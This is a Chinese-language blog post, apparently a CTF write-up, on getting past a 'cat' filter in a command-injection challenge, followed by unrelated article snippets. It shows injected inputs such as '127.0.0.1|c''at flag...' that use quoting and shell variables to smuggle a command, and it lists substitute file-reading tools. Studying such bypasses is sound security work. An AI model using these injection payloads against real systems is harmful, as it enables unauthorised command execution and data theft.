RCE 命令注入 过滤cat绕过方式

server/2024/12/16 10:35:14/

过滤cat

查看当前目录

根据题目可以知道cat被过滤了,并不能简单的得到flag

使用单引号绕过 

127.0.0.1|c''at flag_1429188548629.php

使用双引号绕过 

127.0.0.1|c""at flag_1429188548629.php

利用Shell 特殊变量绕过

127.0.0.1|c$@at flag_1429188548629.php

查看页面源代码找flag

cat的代替

more:一页一页的显示档案内容 
less:与 more 类似 
head:查看头几行 
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示 
tail:查看尾几行 
nl:显示的时候,顺便输出行号 
od:以二进制的方式读取档案内容 
vi:一种编辑器,这个也可以查看 
vim:一种编辑器,这个也可以查看 
sort:可以查看 
uniq:可以查看

http://www.ppmy.cn/server/150607.html

相关文章

黑马 Cpp qt相关笔记

什么是QT QT是一个跨平台的C图像用户界面应用程序框架QT在1991年由奇趣科技开发QT的优点 跨平台,几乎支持所有平台接口简单,容易上手一定程度上简化了内存回收机制有很好的社区氛围可以进行嵌入式开发 QWidget QT注意事项 命名规范 类名 首字母大写,单…

7-3 最大子段和问题

分数 30 作者 王东 单位 贵州师范学院 最大子段和问题。给定由n个整数组成的序列,求序列中子段的最大和,若所有整数均为负整数时定义最大子段和为0。 输入格式: 第一行输入整数个数n(1≤n≤1000),再依…

在 Windows11 上安装k8s的包管理工具Helm

Helm 先简单介绍一下,Helm 是一个用于管理 Kubernetes 应用程序的包管理工具,它帮助用户简化 Kubernetes 应用的安装、配置和管理。可以将 Helm 看作是 Kubernetes 的包管理器,类似于 Linux 上的 apt 或 yum,它能够帮助用户轻松部…

Python自动化操作文档系列

在忙碌的工作中,你是否渴望偶尔的轻松时刻?Python自动化操作文档系列专题文章为你带来全新的 “摸鱼神器”。Python以其高效灵活的特性,能让繁琐任务自动完成,为你争取片刻悠闲。从简单的脚本到复杂的自动化流程,本系列…

监测预警智能分析中心建设项目方案

随着科技的不断进步,地理信息与遥感技术在国家治理、环境保护、灾害预警等领域发挥着越来越重要的作用。监测预警智能分析中心的建设,旨在通过集成先进的遥感技术、地理信息系统(GIS)、大数据分析和人工智能(AI&#x…

使用 Maven 来构建 Scala

以下是使用Maven构建Scala项目的基本步骤: 1. 创建Maven项目 - 可以使用Maven的原型(archetype)来创建项目。在命令行中运行 mvn archetype:generate -DgroupIdcom.example -DartifactIdmy -scala - project -DarchetypeArtifactIdmaven - ar…

工业大数据分析算法实战-day05

文章目录 day05分而治之中的MARS算法神经网络逼近能力解释 day05 今天是第5天,昨日从统计分析开始利用统计学的知识判断当前样本的分布以及估计总体的参数和假设检验的情况,以及介绍了线性回归算法的相关优化点,但是毕竟线性回归是线性划分的…

Vue 核心特性:响应式

Vue的核心特性之一是响应式。这意味着当Vue实例的数据发生变化时,相关的DOM会自动更新。这是通过Vue的响应式系统来实现的。 Vue的响应式系统通过使用Object.defineProperty方法来劫持对象的属性访问,从而达到监听数据变化的目的。当数据发生变化时&…